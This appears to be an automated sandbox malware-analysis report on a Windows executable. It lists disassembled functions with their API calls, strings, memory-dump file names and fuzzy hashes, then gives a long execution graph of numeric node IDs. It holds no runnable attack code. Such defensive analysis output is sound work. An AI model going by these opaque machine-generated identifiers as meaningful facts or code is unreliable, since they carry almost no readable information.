                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                          Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                          Strings
                                          • Error launching installer, xrefs: 00405C48
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                          Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CloseHandlelstrlenwvsprintf
                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                          • API String ID: 3509786178-2769509956
                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                          Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                          Execution Graph

                                          Execution Coverage:4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:2.2%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:107
                                          execution_graph 97916 b9a88 97919 b86e0 97916->97919 97920 b86fd 97919->97920 97921 f0fad 97920->97921 97922 f0ff8 97920->97922 97937 b8724 97920->97937 97925 f0fb5 97921->97925 97928 f0fc2 97921->97928 97921->97937 97994 12aad0 299 API calls __cinit 97922->97994 97992 12b0e4 299 API calls 97925->97992 97933 b898d 97928->97933 97993 12b58c 299 API calls 3 library calls 97928->97993 97931 f1289 97931->97931 97932 b3c30 68 API calls 97932->97937 97938 b8a17 97933->97938 98002 11a48d 89 API calls 4 library calls 97933->98002 97934 f11af 98001 12ae3b 89 API calls 97934->98001 97937->97932 97937->97933 97937->97934 97937->97938 97944 b3f42 68 API calls 97937->97944 97948 b53b0 97937->97948 97976 b39be 97937->97976 97980 b3938 68 API calls 97937->97980 97981 b855e 299 API calls 97937->97981 97982 b5278 97937->97982 97987 d2f70 97937->97987 97990 b84e2 89 API calls 97937->97990 97991 b835f 299 API calls 97937->97991 97995 b523c 59 API calls 97937->97995 97996 1073ab 59 API calls 97937->97996 97997 c1c9c 97937->97997 97944->97937 97949 b53cf 97948->97949 97969 b53fd Mailbox 97948->97969 98003 d0fe6 97949->98003 97950 d2f70 67 API calls __cinit 97950->97969 97952 b69fa 97953 c1c9c 59 API calls 97952->97953 97973 b5569 Mailbox 97953->97973 97954 b69ff 97955 ef165 97954->97955 97956 ee691 97954->97956 98019 11a48d 89 API calls 4 library calls 97955->98019 98015 11a48d 89 API calls 4 library calls 97956->98015 97960 ee6a0 97960->97937 97961 d0fe6 59 API calls Mailbox 97961->97969 97962 b5a1a 98018 11a48d 89 API calls 4 library calls 97962->98018 97963 c1c9c 59 API calls 97963->97969 97965 eea9a 97968 c1c9c 59 API calls 97965->97968 97966 c1207 59 API calls 97966->97969 97968->97973 97969->97950 97969->97952 97969->97954 97969->97956 97969->97961 97969->97962 97969->97963 97969->97965 97969->97966 97970 eeb67 97969->97970 97972 107aad 59 API calls 97969->97972 97969->97973 97974 eef28 97969->97974 98013 b7e50 299 API calls 2 library calls 97969->98013 98014 b6e30 60 API calls Mailbox 97969->98014 97970->97973 98016 107aad 59 API calls 97970->98016 97972->97969 97973->97937 98017 11a48d 89 API calls 4 library calls 97974->98017 97977 b39c9 97976->97977 97979 b39f0 97977->97979 98048 b3ea3 68 API calls Mailbox 97977->98048 97979->97937 97980->97937 97981->97937 97983 d0fe6 Mailbox 59 API calls 97982->97983 97984 b5285 97983->97984 97986 b5294 97984->97986 98049 c1a36 97984->98049 97986->97937 98053 d2e74 97987->98053 97989 d2f7b 97989->97937 97990->97937 97991->97937 97992->97928 97993->97933 97994->97937 97995->97937 97996->97937 97998 c1caf 97997->97998 97999 c1ca7 97997->97999 97998->97937 98131 c1bcc 59 API calls 2 library calls 97999->98131 98001->97933 98002->97931 98005 d0fee 98003->98005 98006 d1008 98005->98006 98008 d100c std::exception::exception 98005->98008 98020 d593c 98005->98020 98037 d35d1 DecodePointer 98005->98037 98006->97969 98038 d87cb RaiseException 98008->98038 98010 d1036 98039 d8701 58 API calls _free 98010->98039 98012 d1048 98012->97969 98013->97969 98014->97969 98015->97960 98016->97973 98017->97962 98018->97973 98019->97973 98021 d59b7 98020->98021 98025 d5948 98020->98025 98046 d35d1 DecodePointer 98021->98046 98023 d59bd 98047 d8d58 58 API calls __getptd_noexit 98023->98047 98024 d5953 98024->98025 98040 da39b 58 API calls __NMSG_WRITE 98024->98040 98041 da3f8 58 API calls 6 library calls 98024->98041 98042 d32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98024->98042 98025->98024 98028 d597b RtlAllocateHeap 98025->98028 98031 d59a3 98025->98031 98035 d59a1 98025->98035 98043 d35d1 DecodePointer 98025->98043 98028->98025 98029 d59af 98028->98029 98029->98005 98044 d8d58 58 API calls __getptd_noexit 98031->98044 98045 d8d58 58 API calls __getptd_noexit 98035->98045 98037->98005 98038->98010 98039->98012 98040->98024 98041->98024 98043->98025 98044->98035 98045->98029 98046->98023 98047->98029 98048->97979 98050 c1a45 __wsetenvp _memmove 98049->98050 98051 d0fe6 Mailbox 59 API calls 98050->98051 98052 c1a83 98051->98052 98052->97986 98054 d2e80 __commit 98053->98054 98061 d3447 98054->98061 98060 d2ea7 __commit 98060->97989 98078 d9e3b 98061->98078 98063 d2e89 98064 d2eb8 DecodePointer DecodePointer 98063->98064 98065 d2ee5 98064->98065 98066 d2e95 98064->98066 98065->98066 98124 d89d4 59 API calls __commit 98065->98124 98075 d2eb2 98066->98075 98068 d2f48 EncodePointer EncodePointer 98068->98066 98069 d2ef7 98069->98068 98070 d2f1c 98069->98070 98125 d8a94 61 API calls 2 library calls 98069->98125 98070->98066 98074 d2f36 EncodePointer 98070->98074 98126 d8a94 61 API calls 2 library calls 98070->98126 98073 d2f30 98073->98066 98073->98074 98074->98068 98127 d3450 98075->98127 98079 d9e4c 98078->98079 98080 d9e5f EnterCriticalSection 98078->98080 98085 d9ec3 98079->98085 98080->98063 98082 d9e52 98082->98080 98109 d32e5 58 API calls 3 library calls 98082->98109 98086 d9ecf __commit 98085->98086 98087 d9ed8 98086->98087 98088 d9ef0 98086->98088 98110 da39b 58 API calls __NMSG_WRITE 98087->98110 98096 d9f11 __commit 98088->98096 98113 d8a4d 58 API calls 2 library calls 98088->98113 98091 d9edd 98111 da3f8 58 API calls 6 library calls 98091->98111 98092 d9f05 98094 d9f0c 98092->98094 98095 d9f1b 98092->98095 98114 d8d58 58 API calls __getptd_noexit 98094->98114 98099 d9e3b __lock 58 API calls 98095->98099 98096->98082 98097 d9ee4 98112 d32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98097->98112 98101 d9f22 98099->98101 98103 d9f2f 98101->98103 98104 d9f47 98101->98104 98115 da05b InitializeCriticalSectionAndSpinCount 98103->98115 98116 d2f85 98104->98116 98107 d9f3b 98122 d9f63 LeaveCriticalSection _doexit 98107->98122 98110->98091 98111->98097 98113->98092 98114->98096 98115->98107 98117 d2f8e RtlFreeHeap 98116->98117 98121 d2fb7 __dosmaperr 98116->98121 98118 d2fa3 98117->98118 98117->98121 98123 d8d58 58 API calls __getptd_noexit 98118->98123 98120 d2fa9 GetLastError 98120->98121 98121->98107 98122->98096 98123->98120 98124->98069 98125->98070 98126->98073 98130 d9fa5 LeaveCriticalSection 98127->98130 98129 d2eb7 98129->98060 98130->98129 98131->97998 98132 b9a6c 98135 b829c 98132->98135 98134 b9a78 98136 b82b4 98135->98136 98143 b8308 98135->98143 98137 b53b0 299 API calls 98136->98137 98136->98143 98141 b82eb 98137->98141 98139 f0ed8 98139->98139 98140 b8331 98140->98134 98141->98140 98144 b523c 59 API calls 98141->98144 98143->98140 98145 11a48d 89 API calls 4 library calls 98143->98145 98144->98143 98145->98139 98146 b6981 98153 b373a 98146->98153 98148 b6997 98162 b7b3f 98148->98162 98150 b69bf 98151 b584d 98150->98151 98174 11a48d 89 API calls 4 library calls 98150->98174 98154 b3758 98153->98154 98155 b3746 98153->98155 98157 b375e 98154->98157 98158 b3787 98154->98158 98175 b523c 59 API calls 98155->98175 98159 d0fe6 Mailbox 59 API calls 98157->98159 98176 b523c 59 API calls 98158->98176 98161 b3750 98159->98161 98161->98148 98164 b7b64 _wcscmp 98162->98164 98177 c162d 98162->98177 98165 c1a36 59 API calls 98164->98165 98166 b7b98 Mailbox 98164->98166 98167 effad 98165->98167 98166->98150 98166->98166 98182 c17e0 98167->98182 98171 effc9 98173 effcd Mailbox 98171->98173 98192 b523c 59 API calls 98171->98192 98173->98150 98174->98151 98175->98161 98176->98161 98178 d0fe6 Mailbox 59 API calls 98177->98178 98179 c1652 98178->98179 98180 d0fe6 Mailbox 59 API calls 98179->98180 98181 c1660 98180->98181 98181->98164 98183 ff401 98182->98183 98184 c17f2 98182->98184 98199 1087f9 59 API calls _memmove 98183->98199 98193 c1680 98184->98193 98187 c17fe 98191 b3938 68 API calls 98187->98191 98188 ff40b 98189 c1c9c 59 API calls 98188->98189 98190 ff413 Mailbox 98189->98190 98191->98171 98192->98173 98194 c1692 98193->98194 98196 c16ba _memmove 98193->98196 98195 d0fe6 Mailbox 59 API calls 98194->98195 98194->98196 98197 c176f _memmove 98195->98197 98196->98187 98198 d0fe6 Mailbox 59 API calls 98197->98198 98198->98197 98199->98188 98200 b1066 98201 b106c 98200->98201 98202 d2f70 __cinit 67 API calls 98201->98202 98203 b1076 98202->98203 98204 ee463 98205 b373a 59 API calls 98204->98205 98206 ee479 98205->98206 98207 ee48f 98206->98207 98209 ee4fa 98206->98209 98258 b5376 60 API calls 98207->98258 98216 bb020 98209->98216 98212 ee4ce 98215 ee4ee Mailbox 98212->98215 98259 11890a 59 API calls Mailbox 98212->98259 98213 ef046 Mailbox 98215->98213 98260 11a48d 89 API calls 4 library calls 98215->98260 98261 c3740 98216->98261 98219 f30b6 98357 11a48d 89 API calls 4 library calls 98219->98357 98220 bb07f 98220->98219 98222 f30d4 98220->98222 98233 bb132 Mailbox _memmove 98220->98233 98254 bbb86 98220->98254 98358 11a48d 89 API calls 4 library calls 98222->98358 98224 f355e 98257 bb4dd 98224->98257 98369 11a48d 89 API calls 4 library calls 98224->98369 98225 f3106 98226 f318a 98225->98226 98359 ba9de 299 API calls 98225->98359 98226->98257 98360 11a48d 89 API calls 4 library calls 98226->98360 98228 10730a 59 API calls 98228->98233 98233->98224 98233->98225 98233->98228 98235 b53b0 299 API calls 98233->98235 98236 b3b31 59 API calls 98233->98236 98239 f3418 98233->98239 98245 f31c3 98233->98245 98246 b3c30 68 API calls 98233->98246 98248 f346f 98233->98248 98252 c1c9c 59 API calls 98233->98252 98253 b523c 59 API calls 98233->98253 98233->98254 98255 d0fe6 59 API calls Mailbox 98233->98255 98233->98257 98266 b3add 98233->98266 98273 bbc70 98233->98273 98354 b3a40 59 API calls Mailbox 98233->98354 98355 b5190 59 API calls Mailbox 98233->98355 98362 106c62 59 API calls 2 library calls 98233->98362 98363 12a9c3 85 API calls Mailbox 98233->98363 98364 106c1e 59 API calls Mailbox 98233->98364 98365 115ef2 68 API calls 98233->98365 98366 b3ea3 68 API calls Mailbox 98233->98366 98368 11a12a 59 API calls 98233->98368 98235->98233 98236->98233 98240 b53b0 299 API calls 98239->98240 98242 f3448 98240->98242 98247 b39be 68 API calls 98242->98247 98242->98257 98361 11a48d 89 API calls 4 library calls 98245->98361 98246->98233 98247->98248 98367 11a48d 89 API calls 4 library calls 98248->98367 98252->98233 98253->98233 98356 11a48d 89 API calls 4 library calls 98254->98356 98255->98233 98257->98215 98258->98212 98259->98215 98260->98213 98262 c374f 98261->98262 98265 c376a 98261->98265 98370 c1aa4 98262->98370 98264 c3757 CharUpperBuffW 98264->98265 98265->98220 98267 ed3cd 98266->98267 98268 b3aee 98266->98268 98269 d0fe6 Mailbox 59 API calls 98268->98269 98270 b3af5 98269->98270 98271 b3b16 98270->98271 98374 b3ba5 59 API calls Mailbox 98270->98374 98271->98233 98274 f359f 98273->98274 98285 bbc95 98273->98285 98492 11a48d 89 API calls 4 library calls 98274->98492 98276 bbf3b 98276->98233 98280 bc2b6 98280->98276 98281 bc2c3 98280->98281 98490 bc483 299 API calls Mailbox 98281->98490 98284 bc2ca LockWindowUpdate DestroyWindow GetMessageW 98284->98276 98286 bc2fc 98284->98286 98346 bbca5 Mailbox 98285->98346 98493 b5376 60 API calls 98285->98493 98494 10700c 299 API calls 98285->98494 98287 f4509 TranslateMessage DispatchMessageW GetMessageW 98286->98287 98287->98287 98289 f4539 98287->98289 98288 f36b3 Sleep 98288->98346 98289->98276 98290 bbf54 timeGetTime 98290->98346 98291 f405d WaitForSingleObject 98296 f407d GetExitCodeProcess CloseHandle 98291->98296 98291->98346 98293 c1c9c 59 API calls 98293->98346 98294 bc210 Sleep 98327 bc1fa Mailbox 98294->98327 98303 bc36b 98296->98303 98297 d0fe6 59 API calls Mailbox 98297->98346 98298 f43a9 Sleep 98298->98327 98300 d083e timeGetTime 98300->98327 98301 b6cd8 277 API calls 98301->98346 98303->98233 98304 bc324 timeGetTime 98491 b5376 60 API calls 98304->98491 98307 f4440 GetExitCodeProcess 98311 f446c CloseHandle 98307->98311 98312 f4456 WaitForSingleObject 98307->98312 98309 b6d79 109 API calls 98309->98346 98311->98327 98312->98311 98312->98346 98313 136562 110 API calls 98313->98327 98315 f38aa Sleep 98315->98346 98316 f44c8 Sleep 98316->98346 98319 c1a36 59 API calls 98319->98327 98321 b5376 60 API calls 98321->98346 98324 bc26d 98330 c1a36 59 API calls 98324->98330 98325 bb020 277 API calls 98325->98346 98327->98294 98327->98300 98327->98303 98327->98307 98327->98313 98327->98315 98327->98316 98327->98319 98327->98346 98519 c1207 98327->98519 98524 112baf 60 API calls 98327->98524 98525 b5376 60 API calls 98327->98525 98526 b3ea3 68 API calls Mailbox 98327->98526 98527 b6cd8 299 API calls 98327->98527 98568 1070e2 59 API calls 98327->98568 98569 1157ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98327->98569 98570 114148 CreateToolhelp32Snapshot Process32FirstW 98327->98570 98328 c1a36 59 API calls 98328->98346 98333 bbf25 Mailbox 98330->98333 98331 11a48d 89 API calls 98331->98346 98333->98276 98489 bc460 10 API calls Mailbox 98333->98489 98336 b39be 68 API calls 98336->98346 98337 b53b0 277 API calls 98337->98346 98338 106cf1 59 API calls Mailbox 98338->98346 98340 b3ea3 68 API calls 98340->98346 98341 f3e13 VariantClear 98341->98346 98342 f3ea9 VariantClear 98342->98346 98343 107aad 59 API calls 98343->98346 98344 f3c57 VariantClear 98344->98346 98345 b41c4 59 API calls Mailbox 98345->98346 98346->98288 98346->98290 98346->98291 98346->98293 98346->98294 98346->98297 98346->98298 98346->98301 98346->98303 98346->98304 98346->98309 98346->98321 98346->98324 98346->98325 98346->98327 98346->98328 98346->98331 98346->98333 98346->98336 98346->98337 98346->98338 98346->98340 98346->98341 98346->98342 98346->98343 98346->98344 98346->98345 98347 b5190 59 API calls Mailbox 98346->98347 98375 b52b0 98346->98375 98384 b9a00 98346->98384 98391 b9c80 98346->98391 98422 ba820 98346->98422 98439 11c270 98346->98439 98446 11e4a0 98346->98446 98449 11412a 98346->98449 98452 11bcd6 98346->98452 98482 c42cf 98346->98482 98486 12e60c 98346->98486 98495 136655 59 API calls 98346->98495 98496 11a058 59 API calls Mailbox 98346->98496 98497 10e0aa 59 API calls 98346->98497 98498 b4d37 98346->98498 98516 106c62 59 API calls 2 library calls 98346->98516 98517 b38ff 59 API calls 98346->98517 98518 b3a40 59 API calls Mailbox 98346->98518 98528 12c355 98346->98528 98347->98346 98354->98233 98355->98233 98356->98219 98357->98257 98358->98257 98359->98226 98360->98257 98361->98257 98362->98233 98363->98233 98364->98233 98365->98233 98366->98233 98367->98257 98368->98233 98369->98257 98371 c1ab7 98370->98371 98373 c1ab4 _memmove 98370->98373 98372 d0fe6 Mailbox 59 API calls 98371->98372 98372->98373 98373->98264 98374->98271 98376 b52c6 98375->98376 98378 b5313 98375->98378 98377 b52d3 PeekMessageW 98376->98377 98376->98378 98377->98378 98379 b52ec 98377->98379 98378->98379 98381 b533e PeekMessageW 98378->98381 98382 b5352 TranslateMessage DispatchMessageW 98378->98382 98383 edf68 TranslateAcceleratorW 98378->98383 98580 b359e 98378->98580 98379->98346 98381->98378 98381->98379 98382->98381 98383->98378 98383->98381 98385 b9a1d 98384->98385 98386 b9a31 98384->98386 98585 b94e0 98385->98585 98619 11a48d 89 API calls 4 library calls 98386->98619 98388 b9a28 98388->98346 98390 f2478 98390->98390 98392 b9cb5 98391->98392 98393 f247d 98392->98393 98397 b9d1f 98392->98397 98398 b9d79 98392->98398 98394 b53b0 299 API calls 98393->98394 98395 f2492 98394->98395 98419 b9f50 Mailbox 98395->98419 98629 11a48d 89 API calls 4 library calls 98395->98629 98396 c1207 59 API calls 98396->98398 98397->98398 98400 c1207 59 API calls 98397->98400 98398->98396 98401 d2f70 __cinit 67 API calls 98398->98401 98403 f24fa 98398->98403 98408 b9f3a 98398->98408 98398->98419 98402 f24d8 98400->98402 98401->98398 98404 d2f70 __cinit 67 API calls 98402->98404 98403->98346 98404->98398 98405 11a48d 89 API calls 98405->98419 98406 b39be 68 API calls 98406->98419 98408->98419 98630 11a48d 89 API calls 4 library calls 98408->98630 98409 b4230 59 API calls 98409->98419 98410 ba775 98634 11a48d 89 API calls 4 library calls 98410->98634 98414 b53b0 299 API calls 98414->98419 98415 f27f9 98415->98346 98419->98405 98419->98406 98419->98409 98419->98410 98419->98414 98421 ba058 98419->98421 98628 c1bcc 59 API calls 2 library calls 98419->98628 98631 107aad 59 API calls 98419->98631 98632 12ccac 299 API calls 98419->98632 98633 12bc26 299 API calls Mailbox 98419->98633 98635 b5190 59 API calls Mailbox 98419->98635 98636 129ab0 299 API calls Mailbox 98419->98636 98421->98346 98423 f2d51 98422->98423 98425 ba84c 98422->98425 98638 11a48d 89 API calls 4 library calls 98423->98638 98427 f2d6a 98425->98427 98435 ba888 _memmove 98425->98435 98426 f2d62 98426->98346 98639 11a48d 89 API calls 4 library calls 98427->98639 98430 d0fe6 59 API calls Mailbox 98430->98435 98431 f2dae 98640 ba9de 299 API calls 98431->98640 98433 b53b0 299 API calls 98433->98435 98434 f2dc8 98436 ba975 98434->98436 98641 11a48d 89 API calls 4 library calls 98434->98641 98435->98430 98435->98431 98435->98433 98435->98434 98435->98436 98437 ba962 98435->98437 98436->98346 98437->98436 98637 12a9c3 85 API calls Mailbox 98437->98637 98440 b4d37 84 API calls 98439->98440 98441 11c286 98440->98441 98642 114005 98441->98642 98443 11c28e 98444 11c292 GetLastError 98443->98444 98445 11c2a7 98443->98445 98444->98445 98445->98346 98786 11f87d 98446->98786 98448 11e4b0 98448->98346 98917 11494a GetFileAttributesW 98449->98917 98453 11bdbb Mailbox 98452->98453 98454 11bcf5 98452->98454 98456 b4d37 84 API calls 98453->98456 98465 11bdc3 Mailbox 98453->98465 98921 b502b 98454->98921 98458 11bdf3 98456->98458 98457 11bd00 98460 b502b 59 API calls 98457->98460 98459 b4d37 84 API calls 98458->98459 98461 11be05 98459->98461 98462 11bd14 98460->98462 98937 113ce2 98461->98937 98462->98453 98464 c1207 59 API calls 98462->98464 98466 11bd25 98464->98466 98465->98346 98467 c1207 59 API calls 98466->98467 98468 11bd2e 98467->98468 98469 b4d37 84 API calls 98468->98469 98470 11bd3b 98469->98470 98471 d0119 59 API calls 98470->98471 98472 11bd4e 98471->98472 98473 c17e0 59 API calls 98472->98473 98474 11bd5f 98473->98474 98475 11412a 3 API calls 98474->98475 98481 11bd88 Mailbox 98474->98481 98477 11bd6e 98475->98477 98476 b502b 59 API calls 98476->98453 98478 c1a36 59 API calls 98477->98478 98477->98481 98479 11bd7f 98478->98479 98925 113f1d 98479->98925 98481->98476 98483 c42e8 98482->98483 98484 c42d9 98482->98484 98483->98484 98485 c42ed CloseHandle 98483->98485 98484->98346 98485->98484 99061 12d1c6 98486->99061 98488 12e61c 98488->98346 98489->98280 98490->98284 98491->98346 98492->98285 98493->98285 98494->98285 98495->98346 98496->98346 98497->98346 98499 b4d51 98498->98499 98507 b4d4b 98498->98507 98500 edb28 __i64tow 98499->98500 98501 b4d99 98499->98501 98502 b4d57 __itow 98499->98502 98506 eda2f 98499->98506 99171 d38c8 83 API calls 3 library calls 98501->99171 98504 d0fe6 Mailbox 59 API calls 98502->98504 98508 b4d71 98504->98508 98509 d0fe6 Mailbox 59 API calls 98506->98509 98514 edaa7 Mailbox _wcscpy 98506->98514 98507->98346 98508->98507 98510 c1a36 59 API calls 98508->98510 98511 eda74 98509->98511 98510->98507 98512 d0fe6 Mailbox 59 API calls 98511->98512 98513 eda9a 98512->98513 98513->98514 98515 c1a36 59 API calls 98513->98515 99172 d38c8 83 API calls 3 library calls 98514->99172 98515->98514 98516->98346 98517->98346 98518->98346 98520 d0fe6 Mailbox 59 API calls 98519->98520 98521 c1228 98520->98521 98522 d0fe6 Mailbox 59 API calls 98521->98522 98523 c1236 98522->98523 98523->98327 98524->98327 98525->98327 98526->98327 98527->98327 98529 12c380 98528->98529 98530 12c39a 98528->98530 99200 11a48d 89 API calls 4 library calls 98529->99200 99173 12a8fd 98530->99173 98534 b53b0 298 API calls 98535 12c406 98534->98535 98536 12c498 98535->98536 98540 12c447 98535->98540 98561 12c392 Mailbox 98535->98561 98537 12c4ee 98536->98537 98538 12c49e 98536->98538 98539 b4d37 84 API calls 98537->98539 98537->98561 99201 117ed5 59 API calls 98538->99201 98541 12c500 98539->98541 98545 11789a 59 API calls 98540->98545 98543 c1aa4 59 API calls 98541->98543 98546 12c524 CharUpperBuffW 98543->98546 98544 12c4c1 99202 c35b9 59 API calls Mailbox 98544->99202 98548 12c477 98545->98548 98551 12c53e 98546->98551 98550 106ebc 298 API calls 98548->98550 98549 12c4c9 Mailbox 98555 bb020 298 API calls 98549->98555 98550->98561 98552 12c591 98551->98552 98553 12c545 98551->98553 98554 b4d37 84 API calls 98552->98554 99180 11789a 98553->99180 98556 12c599 98554->98556 98555->98561 99203 b5376 60 API calls 98556->99203 98561->98346 98562 12c5a3 98562->98561 98563 b4d37 84 API calls 98562->98563 98564 12c5be 98563->98564 99204 c35b9 59 API calls Mailbox 98564->99204 98566 12c5ce 98567 bb020 298 API calls 98566->98567 98567->98561 98568->98327 98569->98327 99231 114ce2 98570->99231 98572 114195 Process32NextW 98573 114244 CloseHandle 98572->98573 98574 11418e Mailbox 98572->98574 98573->98327 98574->98572 98574->98573 98575 c1207 59 API calls 98574->98575 98576 c1a36 59 API calls 98574->98576 98577 d0119 59 API calls 98574->98577 98578 c17e0 59 API calls 98574->98578 98579 c151f 61 API calls 98574->98579 98575->98574 98576->98574 98577->98574 98578->98574 98579->98574 98581 b35e2 98580->98581 98584 b35b0 98580->98584 98581->98378 98582 b35d5 IsDialogMessageW 98582->98581 98582->98584 98583 ed273 GetClassLongW 98583->98582 98583->98584 98584->98581 98584->98582 98584->98583 98586 b53b0 299 API calls 98585->98586 98587 b951f 98586->98587 98588 f2001 98587->98588 98602 b9527 _memmove 98587->98602 98621 b5190 59 API calls Mailbox 98588->98621 98590 f22c0 98627 11a48d 89 API calls 4 library calls 98590->98627 98592 f22de 98592->98592 98593 b9583 98593->98388 98594 b9944 98596 d0fe6 Mailbox 59 API calls 98594->98596 98595 b986a 98598 b987f 98595->98598 98599 f22b1 98595->98599 98610 b96e3 _memmove 98596->98610 98597 d0fe6 59 API calls Mailbox 98597->98602 98601 d0fe6 Mailbox 59 API calls 98598->98601 98626 12a983 59 API calls 98599->98626 98608 b977d 98601->98608 98602->98590 98602->98593 98602->98594 98602->98597 98603 b96cf 98602->98603 98618 b9741 98602->98618 98603->98594 98605 b96dc 98603->98605 98604 d0fe6 Mailbox 59 API calls 98607 b970e 98604->98607 98606 d0fe6 Mailbox 59 API calls 98605->98606 98606->98610 98607->98618 98620 bcca0 299 API calls 98607->98620 98608->98388 98609 f22a0 98625 11a48d 89 API calls 4 library calls 98609->98625 98610->98604 98610->98607 98610->98618 98614 f2278 98624 11a48d 89 API calls 4 library calls 98614->98624 98616 f2253 98623 11a48d 89 API calls 4 library calls 98616->98623 98618->98595 98618->98608 98618->98609 